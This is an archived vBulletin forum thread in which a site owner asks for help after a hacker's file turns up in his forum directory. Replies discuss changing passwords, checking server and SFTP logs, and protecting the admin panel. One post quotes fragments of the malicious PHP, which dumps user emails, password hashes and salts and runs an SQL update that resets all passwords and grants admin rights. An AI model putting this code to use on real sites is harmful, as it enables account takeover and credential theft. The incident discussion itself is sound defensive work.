The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
Hacked by "Tryag"
<a href="http://pastebin.com/6k6UYFYJ" target="_blank">http://pastebin.com/6k6UYFYJ</a>
That file got uploaded to my forum directory somehow, no clue how. |
#2
|
|||
|
|||
It was uploaded from the ftp change ftp, cpanel, and forum admin passwords. Check all files in the ftp then once you have removed all they uploaded then upload a fresh copy yourself then also check if they logged into the admin panel if so check logs
|
Благодарность от: | ||
blind-eddie |
#3
|
||||
|
||||
Your server logs should tell you how they uploaded the file. You should contact your host and have them look through the logs with you to figure out how this was done.
|
2 благодарности(ей) от: | ||
blind-eddie, tbworld |
#4
|
|||
|
|||
What was the file name an directory? Also what version of VB4 are you running.
|
#5
|
|||
|
|||
Quote:
Code:
<td class="style5"><?echo $r[userid]?></td> <td class="style5"><?echo $r[username]?></td> <td class="style5"><?echo $r[email]?></td> <td class="style5"><?echo $r[password]?></td> <td class="style5"><?echo $r[salt]?></td> Code:
$okey=mysql_query("UPDATE user SET password='e8be21235122e78d824eef4514b87be4',salt='oky',usergroupid='6'"); |
#6
|
|||
|
|||
Quote:
Didn't find out how it was uploaded, by logs. |
#7
|
||||
|
||||
Which logs did you check? If you only checked your access_logs and nothing was in there, then that means they didn't use the software to upload the file and so they must have done this directly via your server.
|
#8
|
|||
|
|||
When you connect with SSH, it instantly uses the command "sftp", which calls for the SFTP software to transfer files, basically like FTP. The Shell logs (messages & secure) only shows commands, not what happens inside the software. & sftp-server never showed any logs.
|
#9
|
|||
|
|||
My admincp of one my sites once got hacked. They created a plugin that could be ran via ranks.php and have complete control of my server. Since then I stealth protect that admin folder in addition to firewall SSH, FTP. What was stranged but I never complained, the password I was using was unique and specific only on two sites: here and that site. Lucky for me I basically live on my PC and I was able to catch that P0wersurge SOB instantly and protect myself.
|
#10
|
|||
|
|||
Quote:
Did you use them at any other sites? |
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|